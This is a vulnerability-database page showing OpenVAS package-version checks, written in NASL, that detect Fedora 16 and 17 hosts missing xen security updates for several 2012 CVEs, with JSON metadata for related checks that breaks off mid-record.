Search...

Fedora Update for xen FEDORA-2012-11182

2012-08-30T00:00:00

ID OPENVAS:1361412562310864599
Type openvas
Reporter Copyright (c) 2012 Greenbone Networks GmbH
Modified 2019-03-15T00:00:00

Description

The remote host is missing an update for the

                                        
                                            ###############################################################################
# OpenVAS Vulnerability Test
#
# Fedora Update for xen FEDORA-2012-11182
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if(description)
{
  script_xref(name:"URL", value:"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/084648.html");
  script_oid("1.3.6.1.4.1.25623.1.0.864599");
  script_version("$Revision: 14223 $");
  script_tag(name:"last_modification", value:"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $");
  script_tag(name:"creation_date", value:"2012-08-30 11:22:33 +0530 (Thu, 30 Aug 2012)");
  script_cve_id("CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625",
                "CVE-2012-3432");
  script_tag(name:"cvss_base", value:"7.2");
  script_tag(name:"cvss_base_vector", value:"AV:L/AC:L/Au:N/C:C/I:C/A:C");
  script_xref(name:"FEDORA", value:"2012-11182");
  script_name("Fedora Update for xen FEDORA-2012-11182");
  script_tag(name:"summary", value:"The remote host is missing an update for the 'xen'
  package(s) announced via the referenced advisory.");
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
  script_family("Fedora Local Security Checks");
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/fedora", "ssh/login/rpms", re:"ssh/login/release=FC17");
  script_tag(name:"affected", value:"xen on Fedora 17");
  script_tag(name:"solution", value:"Please install the updated package(s).");
  script_tag(name:"qod_type", value:"package");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

include("revisions-lib.inc");
include("pkg-lib-rpm.inc");

release = rpm_get_ssh_release();
if(!release)
  exit(0);

res = "";

if(release == "FC17")
{

  if ((res = isrpmvuln(pkg:"xen", rpm:"xen~4.1.2~24.fc17", rls:"FC17")) != NULL)
  {
    security_message(data:res);
    exit(0);
  }

  if (__pkg_match) exit(99);
  exit(0);
}

JSON Vulners Source

Initial Source

{"id": "OPENVAS:1361412562310864599", "type": "openvas", "bulletinFamily": "scanner", "title": "Fedora Update for xen FEDORA-2012-11182", "description": "The remote host is missing an update for the ", "published": "2012-08-30T00:00:00", "modified": "2019-03-15T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864599", "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "references": ["2012-11182", "http://lists.fedoraproject.org/pipermail/package-announce/2012-August/084648.html"], "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625", "CVE-2012-3432"], "lastseen": "2019-05-29T18:39:11", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:864585", "OPENVAS:1361412562310864585", "OPENVAS:864636", "OPENVAS:864599", "OPENVAS:864639", "OPENVAS:1361412562310864494", "OPENVAS:864509", "OPENVAS:1361412562310864509", "OPENVAS:1361412562310864639", "OPENVAS:1361412562310864636"]}, {"type": "fedora", "idList": ["FEDORA:00A04209F2", "FEDORA:8E44A20A90", "FEDORA:638FD21667", "FEDORA:63A4E21779", "FEDORA:A2013212DB", "FEDORA:0275A21469", "FEDORA:4C1E320FD7", "FEDORA:C1281214A6", "FEDORA:A80012051E", "FEDORA:403F220D9F"]}, {"type": "cve", "idList": ["CVE-2012-2934", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-3432", "CVE-2012-0217"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28131", "SECURITYVULNS:DOC:28207"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2012-0721.NASL", "OPENSUSE-2012-403.NASL", "SUSE_11_XEN-201206-120606.NASL", "ORACLEVM_OVMSA-2012-0022.NASL", "DEBIAN_DSA-2501.NASL", "FEDORA_2012-9430.NASL", "SUSE_XEN-201206-8180.NASL", "FEDORA_2012-9386.NASL", "FEDORA_2012-9399.NASL", "OPENSUSE-2012-404.NASL"]}, {"type": "suse", "idList": ["SUSE-SU-2012:1044-1", "OPENSUSE-SU-2012:1174-1", "SUSE-SU-2012:0730-1", "SUSE-SU-2012:1043-1", "OPENSUSE-SU-2012:0886-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2501-1:A44C3"]}, {"type": "centos", "idList": ["CESA-2012:0721"]}, {"type": "redhat", "idList": ["RHSA-2012:0721"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-1061", "ELSA-2012-0721-1", "ELSA-2012-1061-1", "ELSA-2012-0721"]}, {"type": "cert", "idList": ["VU:649219"]}, {"type": "canvas", "idList": ["SYSRET"]}, {"type": "exploitdb", "idList": ["EDB-ID:28718"]}, {"type": "cisa", "idList": ["CISA:6C290D75BE52A220342D9856F873C16E"]}, {"type": "zdt", "idList": ["1337DAY-ID-32324"]}], "modified": "2019-05-29T18:39:11", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2019-05-29T18:39:11", "rev": 2}, "vulnersScore": 7.8}, "pluginID": "1361412562310864599", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-11182\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/084648.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864599\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 11:22:33 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\", \"CVE-2012-2625\",\n \"CVE-2012-3432\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2012-11182\");\n script_name(\"Fedora Update for xen FEDORA-2012-11182\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"xen on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2~24.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "naslFamily": "Fedora Local Security Checks"}

{"openvas": [{"lastseen": "2018-01-02T10:58:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625", "CVE-2012-3432"], "description": "Check for the Version of xen", "modified": "2017-12-29T00:00:00", "published": "2012-08-30T00:00:00", "id": "OPENVAS:864599", "href": "http://plugins.openvas.org/nasl.php?oid=864599", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-11182", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-11182\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"xen on Fedora 17\";\ntag_insight = \"This package contains the XenD daemon and xm command line\n tools, needed to manage virtual machines running under the\n Xen hypervisor\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/084648.html\");\n script_id(864599);\n script_version(\"$Revision: 8257 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 11:22:33 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\", \"CVE-2012-2625\",\n \"CVE-2012-3432\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2012-11182\");\n script_name(\"Fedora Update for xen FEDORA-2012-11182\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xen\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2~24.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:58:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625", "CVE-2012-3432"], "description": "Check for the Version of xen", "modified": "2017-12-28T00:00:00", "published": "2012-08-06T00:00:00", "id": "OPENVAS:864585", "href": "http://plugins.openvas.org/nasl.php?oid=864585", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-11190", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-11190\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"xen on Fedora 16\";\ntag_insight = \"This package contains the XenD daemon and xm command line\n tools, needed to manage virtual machines running under the\n Xen hypervisor\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/084684.html\");\n script_id(864585);\n script_version(\"$Revision: 8253 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-28 07:29:51 +0100 (Thu, 28 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-06 11:20:05 +0530 (Mon, 06 Aug 2012)\");\n script_cve_id(\"CVE-2012-2625\", \"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\",\n \"CVE-2012-0029\", \"CVE-2012-3432\");\n script_tag(name:\"cvss_base\", value:\"7.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2012-11190\");\n script_name(\"Fedora Update for xen FEDORA-2012-11190\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xen\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2~9.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.4, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T13:07:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3433", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625", "CVE-2012-3432"], "description": "Check for the Version of xen", "modified": "2018-01-05T00:00:00", "published": "2012-08-30T00:00:00", "id": "OPENVAS:864636", "href": "http://plugins.openvas.org/nasl.php?oid=864636", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-11755", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-11755\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"xen on Fedora 17\";\ntag_insight = \"This package contains the XenD daemon and xm command line\n tools, needed to manage virtual machines running under the\n Xen hypervisor\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/085347.html\");\n script_id(864636);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 09:53:36 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-3433\", \"CVE-2012-3432\", \"CVE-2012-0217\", \"CVE-2012-0218\",\n \"CVE-2012-2934\", \"CVE-2012-2625\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2012-11755\");\n script_name(\"Fedora Update for xen FEDORA-2012-11755\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xen\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.3~2.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625", "CVE-2012-3432"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-08-06T00:00:00", "id": "OPENVAS:1361412562310864585", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864585", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-11190", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-11190\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/084684.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864585\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-06 11:20:05 +0530 (Mon, 06 Aug 2012)\");\n script_cve_id(\"CVE-2012-2625\", \"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\",\n \"CVE-2012-0029\", \"CVE-2012-3432\");\n script_tag(name:\"cvss_base\", value:\"7.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:S/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2012-11190\");\n script_name(\"Fedora Update for xen FEDORA-2012-11190\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"xen on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2~9.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3433", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625", "CVE-2012-3432"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-08-30T00:00:00", "id": "OPENVAS:1361412562310864636", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864636", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-11755", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-11755\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/085347.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864636\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 09:53:36 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-3433\", \"CVE-2012-3432\", \"CVE-2012-0217\", \"CVE-2012-0218\",\n \"CVE-2012-2934\", \"CVE-2012-2625\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2012-11755\");\n script_name(\"Fedora Update for xen FEDORA-2012-11755\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"xen on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.3~2.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-08-30T00:00:00", "id": "OPENVAS:1361412562310864509", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864509", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-9386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-9386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082824.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864509\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 10:35:18 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\", \"CVE-2012-2625\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2012-9386\");\n script_name(\"Fedora Update for xen FEDORA-2012-9386\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"xen on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2~20.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-08T12:56:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625"], "description": "Check for the Version of xen", "modified": "2018-01-08T00:00:00", "published": "2012-08-30T00:00:00", "id": "OPENVAS:864509", "href": "http://plugins.openvas.org/nasl.php?oid=864509", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-9386", "sourceData": "###############################################################################\n# 